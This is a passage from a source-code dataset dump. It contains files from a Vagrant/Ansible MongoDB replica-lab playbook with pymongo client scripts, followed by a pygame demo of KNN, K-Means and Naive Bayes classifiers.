"425d93933207c87032f980ddae2b0cee5a7ed0be", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 330, "license_type": "no_license", "max_line_length": 59, "num_lines": 19, "path": "/tools/client_example/looping.sh", "repo_name": "kita-atsushi/playbook_mongodb", "src_encoding": "UTF-8", "text": "#!/bin/bash\nSCRIPT=$1\n\nif [ $# -ne 1 ]; then\n echo \"Usage: $0 <SCRIPT>\"\n exit 0\nfi\n\nwhile :\ndo\n echo \"@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\"\n echo \"@ Execute python ${SCRIPT}\"\n echo \"@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\"\n python ${SCRIPT}\n echo \"\"\n echo \"Sleeping 3s\"\n sleep 3s\n echo \"\"\ndone\n\n" }, { "alpha_fraction": 0.7447306513786316, "alphanum_fraction": 0.7494145035743713, "avg_line_length": 21.473684310913086, "blob_id": "6103c48cd49afd300a9361914ab3d4171c2c870f", "content_id": "92aca8522df6916170cfe726b403612feee503f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 427, "license_type": "no_license", "max_line_length": 55, "num_lines": 19, "path": "/tools/client_example/find_all_data.py", "repo_name": "kita-atsushi/playbook_mongodb", "src_encoding": "UTF-8", "text": "from pymongo import MongoClient\nfrom pprint import pprint\nfrom datetime import datetime\nimport ConfigParser\nimport os\n\n\nSCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))\n\n\ninifile = ConfigParser.SafeConfigParser()\ninifile.read( SCRIPT_DIR + '/client.ini')\nmongo_url = inifile.get('con', 'mongo_url')\nclient = MongoClient(mongo_url)\n\ndb = client.repltestdb\ncursor = db.testcol01.find({})\nfor doc in cursor:\n print(doc)\n" }, { "alpha_fraction": 0.555444061756134, "alphanum_fraction": 0.6081284284591675, "avg_line_length": 25.223684310913086, "blob_id": "2fa675a7f9fea94b8b9371216ec10a7a557720eb", "content_id": "00e02f76ffc36aa70a50869a3f8e9d3a10fd5ddb", "detected_licenses": [], "is_generated": false, "is_vendor": true, "language": "Ruby", "length_bytes": 1993, "license_type": "no_license", "max_line_length": 87, "num_lines": 76, "path": "/Vagrantfile", "repo_name": "kita-atsushi/playbook_mongodb", "src_encoding": "UTF-8", "text": "# -*- mode: ruby -*-\n# vi: set ft=ruby :\n\nVagrant.configure(\"2\") do |config|\n synced_host_dir = \"./\"\n synced_guest_dir = \"/vagrant\"\n\n config.vm.define \"master\" do |m|\n m.vm.box = \"bento/centos-7.3\"\n m.vm.box_check_update = false\n\n m.vm.hostname = \"master\"\n m.vm.network \"private_network\", ip: \"192.168.33.131\", virtualbox__intnet: \"intnet\"\n m.vm.synced_folder synced_host_dir, synced_guest_dir\n\n m.vm.provider \"virtualbox\" do |m_vb|\n m_vb.cpus = 1\n m_vb.memory = \"724\"\n end\n\n m.vm.provision \"shell\" do |sh|\n sh.env = {\n \"http_proxy\" => ENV['http_proxy'],\n \"https_proxy\" => ENV['https_proxy']\n }\n sh.inline = <<-SHELL\n bash /vagrant/install_tools/install_pip.sh\n bash /vagrant/install_tools/install_ansible.sh\n SHELL\n end\n end\n\n config.vm.define \"mongo1\" do |s1|\n s1.vm.box = \"bento/centos-7.3\"\n s1.vm.box_check_update = false\n\n s1.vm.network \"private_network\", ip: \"192.168.33.132\", virtualbox__intnet: \"intnet\"\n s1.vm.hostname = \"mongo1\"\n s1.vm.synced_folder synced_host_dir, synced_guest_dir\n\n s1.vm.provider \"virtualbox\" do |s1_vb|\n s1_vb.cpus = 1\n s1_vb.memory = \"724\"\n end\n end\n\n config.vm.define \"mongo2\" do |s2|\n s2.vm.box = \"bento/centos-7.3\"\n s2.vm.box_check_update = false\n\n s2.vm.network \"private_network\", ip: \"192.168.33.133\", virtualbox__intnet: \"intnet\"\n s2.vm.hostname = \"mongo2\"\n\n s2.vm.synced_folder synced_host_dir, synced_guest_dir\n\n s2.vm.provider \"virtualbox\" do |s2_vb|\n s2_vb.cpus = 1\n s2_vb.memory = \"724\"\n end\n end\n\n config.vm.define \"mongo3\" do |s3|\n s3.vm.box = \"bento/centos-7.3\"\n s3.vm.box_check_update = false\n\n s3.vm.network \"private_network\", ip: \"192.168.33.134\", virtualbox__intnet: \"intnet\"\n s3.vm.hostname = \"mongo3\"\n\n s3.vm.synced_folder synced_host_dir, synced_guest_dir\n\n s3.vm.provider \"virtualbox\" do |s3_vb|\n s3_vb.cpus = 1\n s3_vb.memory = \"724\"\n end\n end\nend\n" }, { "alpha_fraction": 0.5965664982795715, "alphanum_fraction": 0.6030042767524719, "avg_line_length": 14.533333778381348, "blob_id": "b97cf51b3b3d468c2d24b041ebfdbc099e9ca09b", "content_id": "5c9926b0248554496641c7687411f840e0940f74", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 506, "license_type": "no_license", "max_line_length": 49, "num_lines": 30, "path": "/README.md", "repo_name": "kita-atsushi/playbook_mongodb", "src_encoding": "UTF-8", "text": "# Playbook_mongodb\n\n## Description\nmongodb構築(シャーディング構成なし)のplaybookです\n\n## Overview\n\n![overview](docs/images/overview.png)\n\n## Package\n| Package | Version | Description |\n| --------------- | -------- | ----------- |\n| MongoDB | 3.6.0 | 全Mongo VMにinstall |\n\n\n## Installation\n\n```\n# export http_proxy=<your proxy settings>\n# export https_proxy=<your proxy settings>\n\n# vagrant up\n# vagrant ssh master\n\n$ sudo su -\n# cd /vagrant\n# bash play.sh\n```\n\n以上\n" }, { "alpha_fraction": 0.7179039120674133, "alphanum_fraction": 0.7213973999023438, "avg_line_length": 31.714284896850586, "blob_id": "2cb91754ad0bc43ab983eddb33c147f54ea2f2bc", "content_id": "8ce25e0b61b1307a74510b98fe081f195ba22fed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1145, "license_type": "no_license", "max_line_length": 96, "num_lines": 35, "path": "/tools/client_example/insert_bulk_data_writeconcern.py", "repo_name": "kita-atsushi/playbook_mongodb", "src_encoding": "UTF-8", "text": "from pymongo import MongoClient, WriteConcern, InsertOne\nfrom pymongo.errors import BulkWriteError\nfrom pprint import pprint\nfrom datetime import datetime\nimport ConfigParser\nimport os\n\n\nSCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))\n\ninifile = ConfigParser.SafeConfigParser()\ninifile.read( SCRIPT_DIR + '/client.ini')\nmongo_url = inifile.get('con', 'mongo_url')\nmax_data_num = int(inifile.get('insert', 'bulk_max_count'))\nwtime_out_millsec = int(inifile.get('insert', 'w_concern_repl_timeout_milisec'))\nwrite_concern_opt = inifile.get('insert', 'w_concern_opt')\n\nclient = MongoClient(mongo_url)\ntimestamp = datetime.now().strftime(\"%Y/%m/%d %H:%M:%S%f\")\ndb = client.repltestdb\n\nprint \"@@@ Inserting bulk data %s with write_concern ...\" % (max_data_num)\ncoll = db.get_collection(\n\t'testcol01', write_concern=WriteConcern(w=write_concern_opt, wtimeout=wtime_out_millsec))\ntry:\n coll.bulk_write([InsertOne({\"timestamp\": timestamp, 'id': i}) for i in range(max_data_num)])\n print \"OK.\"\n\nexcept BulkWriteError as bwe:\n pprint(bwe.details)\n\ndata_count = db.testcol01.find({}).count()\nprint \"count = %s\" % data_count\n\nprint \"Done!\"\n" }, { "alpha_fraction": 0.7061611413955688, "alphanum_fraction": 0.7124802470207214, "avg_line_length": 26.521739959716797, "blob_id": "375ef1077ba6703292f185791097cbf92d0e6536", "content_id": "b2b23912fd2dfa78e668915ec652edff36c515f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 633, "license_type": "no_license", "max_line_length": 59, "num_lines": 23, "path": "/tools/client_example/insert_single_data.py", "repo_name": "kita-atsushi/playbook_mongodb", "src_encoding": "UTF-8", "text": "from pymongo import MongoClient\nfrom pprint import pprint\nfrom datetime import datetime\nimport ConfigParser\nimport os\n\nSCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))\n\ninifile = ConfigParser.SafeConfigParser()\ninifile.read( SCRIPT_DIR + '/client.ini')\nmongo_url = inifile.get('con', 'mongo_url')\nclient = MongoClient(mongo_url)\n\ntimestamp = datetime.now().strftime(\"%Y/%m/%d %H:%M:%S.%f\")\ndb = client.repltestdb\ntest_doc = { \"key\": \"timestamp\", \"value\": timestamp }\n\nprint \"@@@ Insert single data...\"\ndb.testcol01.insert_one(test_doc)\ndata_count = db.testcol01.find({}).count()\nprint \"count = %s\" % data_count\n\nprint \"Done!\"\n" }, { "alpha_fraction": 0.6969273686408997, "alphanum_fraction": 0.7025139927864075, "avg_line_length": 30.130434036254883, "blob_id": "ec6b2c7aede65c5ab0bea7013cd776d625545335", "content_id": "1f293d2cd59b06e979cbf70daf3708c06f2620d0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 716, "license_type": "no_license", "max_line_length": 104, "num_lines": 23, "path": "/tools/client_example/insert_bulk_data.py", "repo_name": "kita-atsushi/playbook_mongodb", "src_encoding": "UTF-8", "text": "from pymongo import MongoClient\nfrom datetime import datetime\nimport ConfigParser\nimport os\n\n\nSCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))\n\ninifile = ConfigParser.SafeConfigParser()\ninifile.read( SCRIPT_DIR + '/client.ini')\nmongo_url = inifile.get('con', 'mongo_url')\nmax_data_num = int(inifile.get('insert', 'bulk_max_count'))\n\nclient = MongoClient(mongo_url)\ntimestamp = datetime.now().strftime(\"%Y/%m/%d %H:%M:%S%f\")\ndb = client.repltestdb\nprint \"@@@ Inserting bulk %s data...\" % (max_data_num)\ndb.testcol01.insert_many([{\"timestamp\": timestamp, \"id\": i } for i in range(max_data_num)]).inserted_ids\nprint \"OK.\"\ndata_count = db.testcol01.find({}).count()\nprint \"count = %s\" % data_count\n\nprint \"Done!\"\n" }, { "alpha_fraction": 0.6198019981384277, "alphanum_fraction": 0.7207920551300049, "avg_line_length": 25.578947067260742, "blob_id": "2ae325ed1a620ec4bb1541562c78d7362c5c3181", "content_id": "30674d938767b7ede7965075994a1516f6409efa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 505, "license_type": "no_license", "max_line_length": 78, "num_lines": 19, "path": "/play.sh", "repo_name": "kita-atsushi/playbook_mongodb", "src_encoding": "UTF-8", "text": "#!/bin/bash\nCWD=\"$(cd $(dirname $0) && pwd)\"\nEXTRA_OPTS=\"\"\n\ncat << EOF >/etc/hosts\n127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4\n::1 localhost localhost.localdomain localhost6 localhost6.localdomain6\n\n192.168.33.132 mongo1\n192.168.33.133 mongo2\n192.168.33.134 mongo3\nEOF\n\necho 'StrictHostKeyChecking no' >/root/.ssh/config\n\nansible-playbook ${EXTRA_OPTS} -i ${CWD}/hosts ${CWD}/site.yml \\\n--extra-vars \"http_proxy=${http_proxy} https_proxy=${https_proxy}\"\n\nexit 0\n" } ]
13
projectSKH/Indoor-Outdoor-Scene-Classification
https://github.com/projectSKH/Indoor-Outdoor-Scene-Classification
83684ce5aa8635592e5c93a5dab5a91b206a0e23
e71fd7cd0e8432500934a0236dbbe4567d5b8b3b
572a7f449922aaf34d00ff0bc6c6dfb390300b33
refs/heads/master
2023-08-08T17:01:50.452581
2019-02-21T19:42:35
2019-02-21T19:42:35
674,993,137
1
0
null
2023-08-05T12:19:40
2023-08-05T12:19:40
2019-02-21T19:42:36
null
[ { "alpha_fraction": 0.7885321378707886, "alphanum_fraction": 0.7935779690742493, "avg_line_length": 53.400001525878906, "blob_id": "cba80534a91ff7d877e6dac914e357f7d07598d7", "content_id": "93931da7f028cf5e911b0aa4379fdacaae30cca1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2180, "license_type": "no_license", "max_line_length": 222, "num_lines": 40, "path": "/README.md", "repo_name": "projectSKH/Indoor-Outdoor-Scene-Classification", "src_encoding": "UTF-8", "text": "# Indoor-Outdoor-Scene-Classification\nOne of the application of image classification is to classify scenes and recognize them according to category.\nIt's use can be ranged from autonomous vehicle navigation to video games.\n\n## Dependencies\n- ffmpeg\n- Python\n- Keras(Tensorflow Backend)\n\n## Data Handling\nTo start with the challenge first thing to do is prepare a neat data library with the given classes as outdoor and indoor. \nData was taken from Youtube-8m dataset, at first videos were parsed categorically (Ref-https://github.com/gsssrao/youtube-8m-videos-frames)\nthen frames were extracted using ffmpeg. Finally the data was split into train, test and validation sets.\n\n### Usage\n- Save the videos categorically in folders indoor and outdoor respectively. Go to each folder and run the Frames bash file with first argument as path and second as number of frames per second.\n- Use Split_data.py file with path to input and output folders.\n\n## Training\nAfter the data is prepared, I used CNN to classify images and train the model. \nUsing Image data generator to augment the data and convert image size to 64*64. It neatly takes in the data according to classes. Following model is used to train and validate the images:\n\n![Alt text](https://github.com/prajacta-nagraj/Indoor-Outdoor-Scene-Classification/blob/master/modelcnn.png?raw=true \"Model\")\n\n\nAfter trial/error and using early stopping method overfitting was reduced and the model showed accuracy of 80% for test data.\n\n![Alt text](https://github.com/prajacta-nagraj/Indoor-Outdoor-Scene-Classification/blob/master/Graphs.png?raw=true \"Accuracy\")\n\n\n## Image Classification \nTo finally test the image run Scene-Classification.py file and provide the test image name when prompted.( test image should be in the current directory with othe saved model).\n$ python Scene-Classification.py\n\n## Future Work\nAs seen from the above model few changes can be made to increase accuracy of the model including increasing the training data,image augmentation, L1/L2 regularization. We can also include more layers of Dropout in the end.\n\n## References\n-Youtube-8m dataset \n-Keras/tensorflow blogs and tutorials on modeling a CNN.\n\n\n\n\n" }, { "alpha_fraction": 0.6424116492271423, "alphanum_fraction": 0.6694386601448059, "avg_line_length": 16.66666603088379, "blob_id": "6f848597e6b09e079186ccefde524508cdc857d0", "content_id": "e2020dca3200952a819a4c4ab20764d2ab4705ed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 481, "license_type": "no_license", "max_line_length": 54, "num_lines": 27, "path": "/Scene-Classification.py", "repo_name": "projectSKH/Indoor-Outdoor-Scene-Classification", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom keras.models import load_model\nmodel = load_model('mymodel.h5')\n\n\n# In[16]:\n\n\ntxt = raw_input(\"Type image name: \")\nimport numpy as np\nfrom keras.preprocessing import image\nimg = image.load_img(txt, target_size=(64, 64))\nx = np.expand_dims(image.img_to_array(img), axis=0)\nimages = np.vstack([x])\nclasses = model.predict_classes(images, batch_size=10)\nif classes==1:\n print 'outdoor'\nelse:\n print 'indoor'\n\n\n# In[ ]:\n\n\n\n\n" }, { "alpha_fraction": 0.7133105993270874, "alphanum_fraction": 0.7576791644096375, "avg_line_length": 57.599998474121094, "blob_id": "4fedf960a700e061d74513fe60c34330b9ed915f", "content_id": "566c4e9db1a5b076e4c02cd57bc51452cb443c10", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 293, "license_type": "no_license", "max_line_length": 161, "num_lines": 5, "path": "/Split_data.py", "repo_name": "projectSKH/Indoor-Outdoor-Scene-Classification", "src_encoding": "UTF-8", "text": "#use python 3.6+\n#pip install split_folders\n#python module to split image folder to train,test and split data\nimport split_folders\nsplit_folders.ratio('/home/prajacta/yt8m/youtube-8m-videos-frames/input/', output='/home/prajacta/yt8m/youtube-8m-videos-frames/', seed=1337, ratio=(.8, .1, .1))\n" }, { "alpha_fraction": 0.5583333373069763, "alphanum_fraction": 0.6166666746139526, "avg_line_length": 38, "blob_id": "02432a998659556df6349b1bdb6034dcb01ebdee", "content_id": "e1b7a34da5325ea20ab2ab58284074fc25281456", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 120, "license_type": "no_license", "max_line_length": 97, "num_lines": 3, "path": "/Frames.sh", "repo_name": "projectSKH/Indoor-Outdoor-Scene-Classification", "src_encoding": "UTF-8", "text": "\n\nfor file in *.mp4; do ffmpeg -i \"$file\" $1\"${file%.mp4}\"%04d.png -vf -fps=1/$2 -hide_banner; done\n\n# generate frames\n\n" } ]
4
sheepsy90/InteractiveMachineLearning
https://github.com/sheepsy90/InteractiveMachineLearning
82d373bd90ea0d192fe99f0fc9409e098c528458
d612e2257122180808c422d06be77c8408f2048a
dad14fcfd4500e79153c625ac4450aabcd875f74
refs/heads/master
2016-09-06T03:27:36.620202
2015-03-25T19:39:12
2015-03-25T19:39:12
32,726,516
12
0
null
null
null
null
null
[ { "alpha_fraction": 0.5562579035758972, "alphanum_fraction": 0.5714285969734192, "avg_line_length": 33.34782791137695, "blob_id": "bd6dc37446fd80297c866f4639613ecec2d56f2b", "content_id": "1c51b16cdc01d9fbbd5fc93162e45fc798098535", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1582, "license_type": "no_license", "max_line_length": 110, "num_lines": 46, "path": "/algorithms/KNearestNeighbour.py", "repo_name": "sheepsy90/InteractiveMachineLearning", "src_encoding": "UTF-8", "text": "from collections import Counter\nimport math\n\nclass KNN():\n\n def __init__(self, num_classes):\n self.num_clases = num_classes\n self.data_points = []\n\n def add_data_point(self, label, pnt):\n assert 1 <= int(label) <= self.num_clases\n self.data_points.append((pnt, label))\n\n def clear(self):\n self.data_points = []\n\n def calculate_euclidean_distance(self, e1, e2):\n assert len(e1) == len(e2)\n return math.sqrt(sum([(e1[i] - e2[i])**2 for i in range(len(e1))]))\n\n def estimate(self, k, pnt):\n try:\n distances = [(self.calculate_euclidean_distance(pnt, p[0]), p[1]) for p in self.data_points]\n distances = sorted(distances, key=lambda e: e[0])\n distances = distances[:k]\n distances = [e[1] for e in distances]\n counted = Counter(distances)\n predicted_label = counted.most_common(1)[0][0]\n return predicted_label\n except:\n return None\n\n def estimate_and_get_nearest(self, k, pnt):\n try:\n distances = [(self.calculate_euclidean_distance(pnt, p[0]), p[1], p[0]) for p in self.data_points]\n distances = sorted(distances, key=lambda e: e[0])\n distances = distances[:k]\n distance_labels = [e[1] for e in distances]\n counted = Counter(distance_labels)\n predicted_label = counted.most_common(1)[0][0]\n return predicted_label, distances\n except:\n return None\n\n def get_data_points(self):\n return self.data_points\n\n\n" }, { "alpha_fraction": 0.5306700468063354, "alphanum_fraction": 0.5552060604095459, "avg_line_length": 27.648649215698242, "blob_id": "860560af57037b20b86d02a2410f0240faad9d2c", "content_id": "09d55b0986c652d98c6a804ad85e97f135fea07f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3179, "license_type": "no_license", "max_line_length": 96, "num_lines": 111, "path": "/InteractiveNaiveBayes.py", "repo_name": "sheepsy90/InteractiveMachineLearning", "src_encoding": "UTF-8", "text": "import pygame\nimport math\nfrom algorithms.NaiveBayes import NaiveBayes\n\n#defining color variables\nBLACK = (0, 0, 0)\nWHITE = (190, 190, 190)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0,255)\nYELLOW = (255, 255, 0)\n\ncolour_by_class = {\n 0: RED,\n 1: GREEN,\n 2: BLUE,\n 3: YELLOW\n}\n\n#window settings\nsize = (800, 800)\npygame.init()\nscreen = pygame.display.set_mode(size)\npygame.display.set_caption(\"Naive Bayes\")\nfont = pygame.font.Font(None, 36)\n\n#setting fps variable\nclock = pygame.time.Clock()\n\n# State Variables\ndone = False\n\n\nnaive_bayes_storage = NaiveBayes()\ndraw_area = False\ndraw_cursor = False\nprobabilistic_switch = False\n\nwhile not done:\n pos = pygame.mouse.get_pos()\n\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n done = True\n if event.key == pygame.K_c:\n naive_bayes_storage.clear()\n if event.key == pygame.K_1:\n naive_bayes_storage.add_data_point(0, pos)\n naive_bayes_storage.build_model()\n break\n if event.key == pygame.K_2:\n naive_bayes_storage.add_data_point(1, pos)\n naive_bayes_storage.build_model()\n break\n if event.key == pygame.K_3:\n naive_bayes_storage.add_data_point(2, pos)\n naive_bayes_storage.build_model()\n break\n if event.key == pygame.K_4:\n naive_bayes_storage.add_data_point(3, pos)\n naive_bayes_storage.build_model()\n break\n\n if event.key == pygame.K_m:\n break\n\n if event.key == pygame.K_a:\n if naive_bayes_storage.has_model():\n draw_area = not draw_area\n break\n if event.key == pygame.K_l:\n if naive_bayes_storage.has_model():\n draw_cursor = not draw_cursor\n break\n if event.key == pygame.K_p:\n if naive_bayes_storage.has_model():\n probabilistic_switch = not probabilistic_switch\n break\n\n screen.fill(BLACK)\n\n if draw_area:\n for i in range(0, size[0], 20):\n for j in range(0, size[0], 20):\n x,y = i+10, j+10\n result = naive_bayes_storage.predict((i, j), probabilistic=probabilistic_switch)\n\n if result is not None and not math.isnan(result):\n pygame.draw.circle(screen, colour_by_class[result], (i, j), 1)\n\n\n data_points = naive_bayes_storage.get_data_points()\n # First draw all points on screen\n for pnt in data_points:\n pygame.draw.circle(screen, colour_by_class[pnt[0]], pnt[1], 5)\n\n text = font.render(str(\"FPS: \" + str(int(clock.get_fps()))), True, WHITE)\n screen.blit(text, (700,10))\n\n if draw_cursor:\n # Estimate the mouse cursors colour\n result = naive_bayes_storage.predict(pos)\n\n if result is not None:\n pygame.draw.circle(screen, colour_by_class[result], pos, 8)\n\n pygame.display.flip()\n clock.tick(60)\n\npygame.quit()" }, { "alpha_fraction": 0.5560278296470642, "alphanum_fraction": 0.5656877756118774, "avg_line_length": 33.9594612121582, "blob_id": "9c6cd6cdd02a58ed79652f31806a72d143bfc2b2", "content_id": "6a01e39b03470cc234c04fb08884ac842a8b2f33", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2588, "license_type": "no_license", "max_line_length": 97, "num_lines": 74, "path": "/algorithms/NaiveBayes.py", "repo_name": "sheepsy90/InteractiveMachineLearning", "src_encoding": "UTF-8", "text": "import random\nimport unittest\nimport numpy as np\nimport math\n\n\nclass NaiveBayes(object):\n\n def __init__(self):\n self.data_by_class = {}\n self.statistical_model = None\n\n def add_data_point(self, label, features):\n if label not in self.data_by_class:\n self.data_by_class[label] = []\n self.data_by_class[label].append(features)\n\n def get_data_points(self):\n return [(k, j) for k, v in self.data_by_class.items() for j in v]\n\n def clear(self):\n self.data_by_class = {}\n self.statistical_model = None\n\n def build_model(self):\n # First Step is to calculate mean by features and class\n statistical_attributes = {}\n\n for key, value in self.data_by_class.items():\n np_matrix = np.array(value)\n means, stds = np_matrix.mean(axis=0, dtype=np.float32), np_matrix.std(axis=0, ddof=1)\n statistical_attributes[int(key)] = [(means[i], stds[i]) for i in range(len(means))]\n\n self.statistical_model = statistical_attributes\n\n def calculate_class_probabilities(self, input_vector):\n assert self.statistical_model is not None\n\n probabilities = {}\n for classValue, classSummaries in self.statistical_model.iteritems():\n probabilities[classValue] = 1\n for i in range(len(classSummaries)):\n mean, stdev = classSummaries[i]\n x = input_vector[i]\n try:\n probabilities[classValue] *= self.calculateProbability(x, mean, stdev)\n except:\n probabilities[classValue] *= 0\n return probabilities\n\n def has_model(self):\n return self.statistical_model is not None\n\n def predict(self, input_vector, probabilistic):\n probs = self.calculate_class_probabilities(input_vector)\n lst = [(k, v) for k, v in probs.items()]\n lst = sorted(lst, key=lambda arg: -arg[1])\n\n if probabilistic:\n divisior = math.sqrt(sum([e[1]**2 for e in lst]))\n if divisior != 0:\n lst = [[e[0], e[1]/divisior] for e in lst]\n rnd_nr = random.random()\n cum = 0\n for element in lst:\n cum += element[1]\n if cum > rnd_nr:\n return element[0]\n return lst[-1][0]\n return lst[0][0]\n\n def calculateProbability(self, x, mean, stdev):\n exponent = math.exp(-(math.pow(x-mean,2)/(2*math.pow(stdev,2))))\n return (1 / (math.sqrt(2*math.pi) * stdev)) * exponent\n\n" }, { "alpha_fraction": 0.7775148153305054, "alphanum_fraction": 0.7822484970092773, "avg_line_length": 27.133333206176758, "blob_id": "b2d0853a0bbb48cebaa4f5fd7f84250e07c13935", "content_id": "4639df7c9521e78a22da59a7b384e708c18f3360", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 845, "license_type": "no_license", "max_line_length": 119, "num_lines": 30, "path": "/README.md", "repo_name": "sheepsy90/InteractiveMachineLearning", "src_encoding": "UTF-8", "text": "# InteractiveMachineLearning\n\nThree small applications showing KNN, KMeans and NaiveBayes Classifier\n\nThis Script can be started having pygame.\n\nWhen the tool is started the following keys can be used:\n\n= KNN =\n\nNumbers 1-4: Place a labeled point on the current mouse position\n\nKey a - Area Draw - Display a Grid with coloured points regarding their assigned label\nKey l - DrawLines - Display the Label Assignment for the Current Mouse Position as well as the lines to the k-Neigbours\n\nKey +/- Increase/Decrease k\n\n= KMeans =\n\nNumbers 1: Place a data point on the current mouse position\nNumbers 2: Place a cluster startpoint point on the current mouse position\nKey s: Run the Algorithm\nKey c: Clear\n\n\n= Naive Bayes =\n\nAS KNN\n\nAdditionally use the Key p to flicker the borders based on a random number generated absed on the class probabilities \n" }, { "alpha_fraction": 0.5353003144264221, "alphanum_fraction": 0.562346339225769, "avg_line_length": 24.20353889465332, "blob_id": "d583b68026c431ee8bb9e0b567a35fc45703071d", "content_id": "d00ced7cd952fda1dbacccbee98a007e8294935a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2847, "license_type": "no_license", "max_line_length": 93, "num_lines": 113, "path": "/interactiveKMeans.py", "repo_name": "sheepsy90/InteractiveMachineLearning", "src_encoding": "UTF-8", "text": "import time\nimport pygame\n\n#defining color variables\nfrom algorithms.KMeans import KMeans\n\nBLACK = (0, 0, 0)\nWHITE = (190, 190, 190)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nGREY = (150, 150, 150)\nBLUE = (0, 135, 255)\nYELLOW = (255, 255, 0)\n\ncolour_by_class = {\n 0: RED,\n 1: GREEN,\n 2: BLUE,\n 3: YELLOW\n}\n\n#window settings\nsize = (800, 800)\npygame.init()\nscreen = pygame.display.set_mode(size)\npygame.display.set_caption(\"K-Means\")\nfont = pygame.font.Font(None, 36)\n\n#setting fps variable\nclock = pygame.time.Clock()\n\n# State Variables\ndone = False\nk_mean_started = False\nstable = False\nkmeans_state = 0\n\n\ndef mean(lst):\n xs = [e[0] for e in lst]\n ys = [e[1] for e in lst]\n\n meanxs = sum(xs) / float(len(xs))\n meanys = sum(ys) / float(len(ys))\n\n return int(meanxs), int(meanys)\n\n\nkmean_storage = KMeans()\n\nwhile not done:\n pos = pygame.mouse.get_pos()\n\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n done = True\n if event.key == pygame.K_c:\n k_mean_started = False\n stable = False\n kmean_storage.clear()\n if event.key == pygame.K_1:\n kmean_storage.add_data_point(pos)\n break\n if event.key == pygame.K_2:\n kmean_storage.add_centroid(pos)\n break\n if event.key == pygame.K_s:\n if kmean_storage.can_be_started():\n k_mean_started = True\n break\n\n screen.fill(BLACK)\n\n if k_mean_started:\n if kmeans_state == 0:\n # Assign and draw\n assignments = kmean_storage.kMeans_assignment()\n centroids = kmean_storage.get_centroids()\n\n for key in assignments:\n lst_pnts = assignments[key]\n centroid_coords = centroids[key]\n for point in lst_pnts:\n pygame.draw.line(screen, colour_by_class[key], point, centroid_coords, 1)\n kmeans_state = 1\n\n elif kmeans_state == 1:\n # Move\n assignments = kmean_storage.kMeans_assignment()\n new_centers = {k: mean(v) for k, v in assignments.items()}\n stable = kmean_storage.set_new_centers(new_centers)\n kmeans_state = 0\n\n time.sleep(1)\n\n if stable:\n text = font.render(str(\"Stable\"), True, WHITE)\n screen.blit(text, (700,10))\n\n data_pnts = kmean_storage.get_data()\n for pnt in data_pnts:\n pygame.draw.circle(screen, WHITE, pnt, 2)\n\n cluster_centroids = kmean_storage.get_centroids()\n for pnt in cluster_centroids:\n k, v = pnt, cluster_centroids[pnt]\n pygame.draw.circle(screen, colour_by_class[k], v, 4)\n\n pygame.display.flip()\n clock.tick(60)\n\npygame.quit()" }, { "alpha_fraction": 0.4912863075733185, "alphanum_fraction": 0.5244813561439514, "avg_line_length": 31.486486434936523, "blob_id": "3f4feb08b81550dc0db1be8af23e9d90b2a0d63a", "content_id": "4b69a029e08a7f4f52ef8a886efb91fa6dc1e9a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1205, "license_type": "no_license", "max_line_length": 94, "num_lines": 37, "path": "/algorithms/KNearestNeighbourTest.py", "repo_name": "sheepsy90/InteractiveMachineLearning", "src_encoding": "UTF-8", "text": "import random\nimport unittest\n\nfrom algorithms.KNearestNeighbour import KNN\n\n\nclass TestKNN(unittest.TestCase):\n\n def test_basic_behaviour(self):\n with open(\"../data_sets/pima-indians-diabetes.data\", 'r') as f:\n data = f.read()\n data = data.split(\"\\n\")\n data = [d.split(\",\") for d in data[0:len(data)-1]]\n data = [[float(p) for p in d] for d in data]\n\n random.shuffle(data)\n train, test = data[:int(len(data)*0.67)], data[int(len(data)*0.67):]\n\n pnts_label_0 = [p[0:len(p)-1] for p in train if int(p[-1]) == 0]\n pnts_label_1 = [p[0:len(p)-1] for p in train if int(p[-1]) == 1]\n\n knn = KNN(2)\n\n [knn.add_data_point(1, p) for p in pnts_label_0]\n [knn.add_data_point(2, p) for p in pnts_label_1]\n\n\n for k in [1, 3, 5, 7, 9, 11, 13, 15]:\n success = 0\n for data_element in test:\n pnt, label = data_element[0: len(data_element)-1], data_element[-1]\n label += 1\n\n if int(label) == knn.estimate(k, pnt):\n success += 1\n\n print \"Result for k={}:\".format(k), success, len(test), success / float(len(test))\n\n\n\n" }, { "alpha_fraction": 0.5833333134651184, "alphanum_fraction": 0.5833333134651184, "avg_line_length": 23, 